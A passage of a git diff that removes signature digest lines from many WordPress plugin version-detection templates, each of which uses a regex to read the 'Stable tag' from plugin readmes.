'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b4b7dfd6946b69994bddfc1729ae393915dc48e6e4aa08c314461c299fd7287f022100a584a71f72820db1becaa23b7e15df9647e3cff9778b139e220f6c6f5012e065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 8a1ab8ac28..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c4aade3b051b831f2dad4b53d6147781b9bc7e012f9991c84d218b79bb82ae1b022022700907ad664de4c30bec6a41556d32f86d70140ede1049789a26d8d8f60772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 6f1471becc..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220220c8f284284497eb9e7be0bbd1176b50eb36bee2c1b365dcc1c27727bd75ede022100c27a16245a48f97763d900de6399b258af6559ed8e1589a0adae47dbaf8d7340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index c48ee10712..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030f207e254246935d46280a7ddbc6bea63e5eb7ce966f5ac2be2a7b9de7c3dd402201363d00316cbcdf19ee663662d788ea7449157066f4d889a561239004985d476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 169defa16a..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220374272efd068099e0ccba6e9a0bc6fc9e4d75d77648eb0bcb848f78855a280fe022100f96821f423a5520892e9364d388e1b926dd7494a16af02fb3bc8278be1f4f1b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 8d957b23f3..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220264cde318f2710a4ceeb38276e13c87d7e18407f7a421d53c6b6ab4c6a8905c902203492bc8e975e1ff94ba9f171f571159206e9b4f58dae8d825ea6e12ada39df0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index d124135f60..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220482b93319a21077e744fb59a9bd87ae372a1cb5661db88bb608c44b18b0810a5022100ed696bc8a8f0333417450617f650316ceae3d75fb070813cb0e871a2673bd542:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 16483912fe..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220628332b713b6dd181805348e87b9ef1f0455d22a87c7982576693d5afec3adc30221009e28809e5ad8e47a4a08db4f21cb38fc0cae779daccca9b38898829f97f93f87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 56ad4f9367..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e1665ac4fc49f85de15d55aaf1b890e3d9fb18120fb27196b1576666a2aa1fa2022100cba09d3d275800a07095256a45338f5ad6826c489855bfcfdc7bc3d2734646ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 0e5c38fb96..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac98cec51430a1ba1898feaafc44b477c890e82bd18783880bd69a581e509651022100c6b99b6ac7134cee8e28e30eba0c90215778edfc1d0d75813a1ccaa119239fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 729d5a1fe8..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220581a59076bff58be3c2baf6be3e54861e067e743ba3487c5aefd6f0f67c29089022100994b749c1a3ba0570107f28a3e24ad70bb4ef796a64ee58d1468b2062b622a8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 5f46ab7436..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022077b0108c4b1f60b75baacaac1b4e06c2ae404739e97413996cb9d8bb58460bd602204416a47fbde2821e538c63a61322d209946d3fee15868b12fe8c0c0a54bdc0e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 22a7c21e14..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee1ed6c4b878b62275d1058fe9e7a7ddbea296b358be1390f16c711111c01d17022100e294695baa8c0d79b9fb15f051faad3a206f7feb6aaa058929ff46cb691a64ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 3a3bd03cb3..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5c858e9cd0b452231d487576c7c3a836ef97967433eec3b9d1d1819566532300221008acc87ad1a0983fc9542393fdb0483e427db0980d2f02cc1ea6e9471ed0f1781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 704d811001..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034eda9478cbdc475b6dd6b178a087e67d00624e0a3583ac1c241c33b6baea1fb022061b8085d7a637f72f17cb7ffd8fcc6ea8e79fd44b26ab9bdbf47cf0b612e3700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index ef28c52a78..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100868f5626008efffc62ed64db4ef3976016130771f1b0dd491eb4ee52a8d1870c022100a87e44027b150413a5351e2928a9e5bf5189df94817a4ea3783fafa8850a6215:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 7c3a0e5308..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220627b84da19b837adfd3f6a800cd85c7114d1d208b9af7a9dadcdc1cd872dfce3022100ceb47b50b390e4009e1251187647596263a612f2127aaaa468f6fe0aa886ef29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index a144fef015..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220230889aa1479b5b3824454068f759c16d2f752ac641661694fb468d46dfa10870220193b924e02f14b10be9aa707a17bbc167e85221355adf4cca138ed57fd03ce48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index f03d4112c8..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fec8b9fd35367cc2b6b97b7d24cb576f85f1d6058ff5f80e9a1e51fe07d22bcb022100d7924dee2b43a879af8d2e1485b53517ca5ae4ec1ff9f7a29f30d795bceb271c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index e22ac22fa3..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220444f253e4c0a556696dc068c825b09f97ff6d425f4e698044a01783a06b916f502201ff4dd34c8d373af8cbf58294bbbb2e8a9a70e82549b1fed75f0ac3b83d16017:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index d7ce6a8742..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204b54c649a8164c3510f424998f68eac9bbaaf85a8b1f0df14869c153c2cd54d1022007b79c7458203a4c8ddc299c96357a5938c1e93cbcede8e6fc9b135e28256267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 2ef77868ec..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024094acd37f83acbff0b903588474e21ba1cfd4fa954ff7645efa1528bf2b881022100f0234939dc81203a161963ec0c9c9f365aa482627674f9c1a1553d9734afd0b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index e2e9e3b0e9..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d276d853d061233075dba4bc894eed35e2a6dfffe7319e9c6f4ff8db08db95610220277c459f04777a77b1420c814023c47dc486d15e12e779e3aa1a6068d672299b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index e1ba6078d7..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f08446643c06f51b457036f7627af63d7c6d2a0b03f7bf9d892bc4081d19806022100e45e9d4bad72f8b80cefddc115740fe5ba720e448e53135ea569737ff33a1fc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index c9b0e23dcd..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220690f0438641d45b3179528e929d26c97355f86d0e99c4dd300cf53c7a3b050e7022023ff0f0c33479f076a12333cf26eefcf58b19fd1127429cc3c9f5faae2021675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 748b062dd0..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a23dab8f41bfbed907caa1fd9fb2dc982b323ff31edb63cd002f79fb5fe0f42c0221008b2f86f2652550134457da90b23fd780528712dfd484076cbb10dcd45c30d0bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 5917f54b45..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e609c01848fe7fa72a5a68b6b40ba852fe2b764bdcba1430878a1bfac72e88d02206330f4ca49f32fb0ed473b5388a4455af3d0c4adf3fe67f1a24c3272a599ed72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e57761b04b..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e1b6ca4058d8643884e8abe8a4d82cd44cdbdb57086095b314045b3a706d78d802210082f887bb6d33bae2fdb064af7828dbbf8da6dc7d28e63a89cbf5454370a6deb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index b01710131a..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cdee863d49782412ab52ca741e919b76f98dd0963a8b2814fd8e09da5abdbf29022100dc982d9ce3af35284fcbab9b1eebea3bb8ca9be79cfd34817ee6740a5705933f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 007533f212..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e11cc1fe41a21f0326c68812e0964eac30529ad6aaea6eab9c72a68561ca3890220452f7e91b63c157406996960ec15737cafe47012d6ddcfb93e89b130cd6fc1d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4c4fc31429..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd7673fc7595e0a5065f0b017fc4f80aae24610858f9bb0b702de6c408070acf0221009c56113b97921e450e3eff8fddc7c0d05abf44f3e7216e2c80e95bfb361b85ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index bf3fc280e1..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201588a8e80ac492846b003b3ebe2f2024199f8cc00cbd744874a1105f7f42db84022100a12e3b7f25e9ec792d8eed7a1db6e083d647128550e964c540907137213e7d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 8437fe8e06..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a82aca6ebfdd52a53f5593f98e10eddf8e61bb6c14b70c90289bd1121437624c022100deac835b23019dc87a70211a023bb4a71d5ba3b5cd900c2b6c5ab4fcf1411745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 9895d21150..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a90f7ab17bc92f5d0658e618eca82bb407c98258a0c2a41f6ccbb814a874c310022100f50eb930d1c842bd24b311ac590bae17fb85458d34cd60d2f36c5a32ed15a126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 2bd6cf720b..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ff9be6ed84ad5ef63e754e78f7f9525998a61c121d13df6cd980cb31b21022102201f3f62162863ce3684784ec5cce1b10787eb751b1b33433c9b3d908d850cee21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 9e4567e6db..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ed866c67e652f3a0305d10f99a834d5c3874b16607bcca045ef67c741752e1102210090167bae37fccf518ae99bf293d0c13f1f615e2fc3688db6a0de19900db24d68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 28e77c2dff..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f15c26a04c6428c6b430dc8f14d1a60b4c99a126cd43ea30b24291575d410ea7022070cce3a5a4ecf00fd19dd25f8a7c1bce8a49d7e731e8a5910c8762e612cab10f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index bc57ac1012..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bde9366099040b82c3755acef55a935ce7ee4a0f66b0d9bd9e10a44cc8d42eae022100fb187244ff8039da101e912aad189be3abb159b86a4ad66c7196b3027e979c96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 674b140c79..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206283fb7cc9083ea3fecedd4dbd5bb6d7e10c2b1f83b1fdd86de0252d83f9383c02202746fec11780dbd209348da247eb6907684b75569fe4dca9f995120ea90627c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index bb8942c9db..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100822c8c8ae1fe8f14449cfec58308c8d6b1333de041886ef1ff8c737d1765cd33022100c9571fb5745307a01c1655fb0bfa95f08445f16782cc134f0f71657316bb7119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 404f7efad9..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002248fba3a1e16633d81331cce0d1f30da81d88cc0114a920e23342d699181380221008e010a0f4c0cb5fdd504ad839eb4ea9b040041bac6cda20c1b785b4714d209f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index a39b963183..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0e25a1cc83e187433290aad77d39de8d7874ed7939860d737ebc643d1ef5173022100ef2e345ad050cb76b28a6430cea2377573a121eb95e661b08202fbdd0f4edeb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 8d915408bf..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d87e706aa2b0738badea88c663ffff6f9d1b34a39f65a6ae2d024b7b73d369af0220229dc9fb5051050651f7431e1ee2b1905daf533387be2641a40b3bb0ba0c6e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 41841560a9..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c76331da2fe7f533a86d60ceececa0a8b92ddc7965a4d42666b31e61c40db10602202e146683edb2849f19d7e0e5ee22682da24fdb8dc9b31e8c2896809e5cc3fa2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 60ae201319..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210080153ecb2ac38db8039282adb79486f67e82d9352d4edc2b0f32e4a95667556b0220131eea3c9ec8804673c9d3dd2d5a58ac09991bf077e374b343ae82f4d56bc2ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index f4b3d5a129..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022027baad482dc0d251aebe5af0a175e4ad61335680ca28fe4dfc88b1f9826c56cc02200450f8a146ff3cd5405b63763a790d91f71351ed982256a3c47395e275720d48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 73c62fc1f9..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 